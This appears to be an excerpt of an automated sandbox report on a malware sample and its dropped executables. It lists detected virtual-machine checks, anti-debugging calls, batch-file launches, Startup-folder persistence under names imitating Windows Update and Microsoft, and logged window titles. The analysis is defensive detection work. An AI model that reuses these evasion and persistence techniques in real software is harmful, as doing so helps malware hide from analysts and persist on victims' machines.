          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Essential Server Solutions without Hyper-V
          Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
          Source: RRqyIX.exe, 00000001.00000002.2244767719.0000000000683000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166751955.0000000000683000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp&f%SystemRoot%\system32\mswsock.dllj
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
          Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %Windows 2016 Microsoft Hyper-V Server
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: +Windows 8.1 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
          Source: Amcache.hve.1.drBinary or memory string: VMware20,1
          Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
          Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V (core)
          Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V (core)
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
          Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
          Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
          Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
          Source: Amcache.hve.1.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
          Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: server.exe, 00000004.00000002.4625843367.0000000000F2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ,Windows 2016 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V (core)
          Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
          Source: server.exe, 00000004.00000002.4625843367.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.2217703436.0000000002B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: VBoxService.exe
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V
          Source: RRqyIX.exe, 00000016.00000002.2612085202.0000000000A85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Hyper-VU
          Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: *Windows 10 Server Standard without Hyper-V
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
          Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: VMWare
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
          Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
          Source: RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166751955.0000000000657000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
          Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAPI call chain: ExitProcess graph end nodegraph_1-1049
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 21:15:31 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:32:54 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:40:53 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:03:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 09:20:33 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 05:45:48 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 16:17:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 13:38:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 10:40:33 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:50:48 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:41:22 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:44:28 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:42:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:24:06 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 12:26:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 03:47:47 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 08:30:09 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:03:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 09:41:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 03:27:22 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:01:25 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/27 | 17:28:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 22:54:38 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 07:30:00 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:19:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:39:57 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 07:27:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 21:54:41 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:12:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 03:44:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 13:32:16 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 21:22:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 15:19:16 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 06:59:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 14:56:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/28 | 00:01:00 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 17:57:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 20:04:30 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 07:13:58 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 16:39:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 14:30:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:20:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 06:00:26 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 07:20:41 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:57:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 12:10:57 - Program Manager
